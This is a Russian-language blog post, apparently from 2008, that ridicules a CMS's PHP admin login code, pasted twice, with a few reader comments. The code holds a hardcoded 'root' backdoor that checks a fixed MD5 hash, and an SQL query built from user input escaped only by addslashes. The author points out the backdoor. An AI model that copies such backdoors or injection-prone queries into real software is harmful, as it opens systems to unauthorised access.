по долгу работы приходится иметь дело со многими cms, их функциональной частю и системами аутентификации. Вот на днях попался такой пациент)
1 <?php
2
3 function authenticate()
4 {
5 global $current_tpl_data, $CSSM_CONFIG, $CSSM_CONSTS, $CSSM_VARS;
6 if (session_id()===”) die(”For administrative login is needed browser with session support.”);
7 unset($_SESSION['authtest']);
8 usleep(500000); // fucking bruteforce lamers
9
10 # output text here
11 $tplclass = new template($current_tpl_data['path']);
12 $tplclass->set_filenames(array(’login’ => ‘login.tpl’));
13 $tplclass->assign_vars(array_merge(array_add_prefix_to_keys($CSSM_CONSTS, ‘C_’), array_add_prefix_to_keys($CSSM_VARS, ‘V_’), array_add_prefix_to_keys($CSSM_CONFIG, ‘F_’)));
14 $tplclass->pparse(’login’);
15
16 ob_end_flush();
17 die;
18 }
19
20 if (isset($_SESSION['account']['id'], $_SESSION['account']['fp']) || isset($_POST['query_login'], $_POST['query_word']))
21 {
22 if (isset($_POST['query_login'], $_POST['query_word']))
23 {
24 $_SESSION['account']['id'] = addslashes($_POST['query_login']);
25 $_SESSION['account']['hs'] = md5(”58uvbg5tbd5i8ydnr5i8d”.md5($_POST['query_word']));
26 $_SESSION['account']['fp'] = md5($_SERVER['HTTP_USER_AGENT'].$_SESSION['account']['hs'].$_SERVER['REMOTE_ADDR']);
27 }
28 $user = $_SESSION['account']['id'];
29 $hs = $_SESSION['account']['hs'];
30
31 if (($user!=”) and ($hs !=”))
32 {
33 if ($user!==’root’)
34 {
35 $login = array();
36 $login['ru'] = $user;
37 $login = lang_const_serialize($login);
38
39 $r2 = $db->query(”SELECT * FROM admins WHERE user_login=’$login’”);
40 $acc = $db->fetch_array($r2);
41 if ($db->num_rows($r2)>0)
42 {
43 $entered_pwd_hash = array();
44 $entered_pwd_hash['ru'] = md5(”4w35g4578hdit5kh8t5h”.$hs);
45 $entered_pwd_hash = lang_const_serialize($entered_pwd_hash);
46 $IsLogin = ((string)$acc['user_pass']==(string)$entered_pwd_hash) && (($_SESSION['account']['fp']===md5($_SERVER['HTTP_USER_AGENT'].$hs.$_SERVER['REMOTE_ADDR'])));
47 if (!$IsLogin)
48 {
49 authenticate();
50 }
51 else
52 {
53 $id_user = $acc['id'];
54 }
55 }
56 else authenticate();
57 }
58 else
59 {
60 if (($user===’root’) && ($_SESSION['account']['fp']===md5($_SERVER['HTTP_USER_AGENT'].$hs.$_SERVER['REMOTE_ADDR'])) && md5(”4w35g4578hdit5kh8t5h”.$hs)===’d89789cb7d4e9875f17de4f6b844ba79′)
61 {
62 $name=’root’;
63 $user=’root’;
64 $id_user = 1000000000000001;
65 }
66 else authenticate();
67 }
68 }
69 else authenticate();
70 }
71 else
72 {
73 authenticate();
74
75 }
76 ?>
2
3 function authenticate()
4 {
5 global $current_tpl_data, $CSSM_CONFIG, $CSSM_CONSTS, $CSSM_VARS;
6 if (session_id()===”) die(”For administrative login is needed browser with session support.”);
7 unset($_SESSION['authtest']);
8 usleep(500000); // fucking bruteforce lamers
9
10 # output text here
11 $tplclass = new template($current_tpl_data['path']);
12 $tplclass->set_filenames(array(’login’ => ‘login.tpl’));
13 $tplclass->assign_vars(array_merge(array_add_prefix_to_keys($CSSM_CONSTS, ‘C_’), array_add_prefix_to_keys($CSSM_VARS, ‘V_’), array_add_prefix_to_keys($CSSM_CONFIG, ‘F_’)));
14 $tplclass->pparse(’login’);
15
16 ob_end_flush();
17 die;
18 }
19
20 if (isset($_SESSION['account']['id'], $_SESSION['account']['fp']) || isset($_POST['query_login'], $_POST['query_word']))
21 {
22 if (isset($_POST['query_login'], $_POST['query_word']))
23 {
24 $_SESSION['account']['id'] = addslashes($_POST['query_login']);
25 $_SESSION['account']['hs'] = md5(”58uvbg5tbd5i8ydnr5i8d”.md5($_POST['query_word']));
26 $_SESSION['account']['fp'] = md5($_SERVER['HTTP_USER_AGENT'].$_SESSION['account']['hs'].$_SERVER['REMOTE_ADDR']);
27 }
28 $user = $_SESSION['account']['id'];
29 $hs = $_SESSION['account']['hs'];
30
31 if (($user!=”) and ($hs !=”))
32 {
33 if ($user!==’root’)
34 {
35 $login = array();
36 $login['ru'] = $user;
37 $login = lang_const_serialize($login);
38
39 $r2 = $db->query(”SELECT * FROM admins WHERE user_login=’$login’”);
40 $acc = $db->fetch_array($r2);
41 if ($db->num_rows($r2)>0)
42 {
43 $entered_pwd_hash = array();
44 $entered_pwd_hash['ru'] = md5(”4w35g4578hdit5kh8t5h”.$hs);
45 $entered_pwd_hash = lang_const_serialize($entered_pwd_hash);
46 $IsLogin = ((string)$acc['user_pass']==(string)$entered_pwd_hash) && (($_SESSION['account']['fp']===md5($_SERVER['HTTP_USER_AGENT'].$hs.$_SERVER['REMOTE_ADDR'])));
47 if (!$IsLogin)
48 {
49 authenticate();
50 }
51 else
52 {
53 $id_user = $acc['id'];
54 }
55 }
56 else authenticate();
57 }
58 else
59 {
60 if (($user===’root’) && ($_SESSION['account']['fp']===md5($_SERVER['HTTP_USER_AGENT'].$hs.$_SERVER['REMOTE_ADDR'])) && md5(”4w35g4578hdit5kh8t5h”.$hs)===’d89789cb7d4e9875f17de4f6b844ba79′)
61 {
62 $name=’root’;
63 $user=’root’;
64 $id_user = 1000000000000001;
65 }
66 else authenticate();
67 }
68 }
69 else authenticate();
70 }
71 else
72 {
73 authenticate();
74
75 }
76 ?>
вот так у нас кодят))
з.ы. кто скажет как юзать подсветку кода на вордпресс.ком тому респект от меня
з.з.ы. а у нас тут еще и бекдорчег есть :-х
4 comments
Comments feed for this article
Ноябрь 19, 2008 в 3:25 дп
Anjey
“Блог в ридер однозначно”
Декабрь 23, 2008 в 6:03 дп
ad
Интересная статейка, автору респект, гы могу помоч с развитием, пиши icq 222546
Январь 10, 2009 в 8:49 пп
podarok
а внешний javascript можно подключать здесь?
если можно – то в принципе сложного ничего нету – использовать любой из подсетиловок блоков code
если нельзя – то как рекомендация – использовать внешний подсветиватель кода, который вставляет inline style css
Январь 11, 2009 в 12:07 пп
lc0d3r
о.. интересно.. а можно детальнее?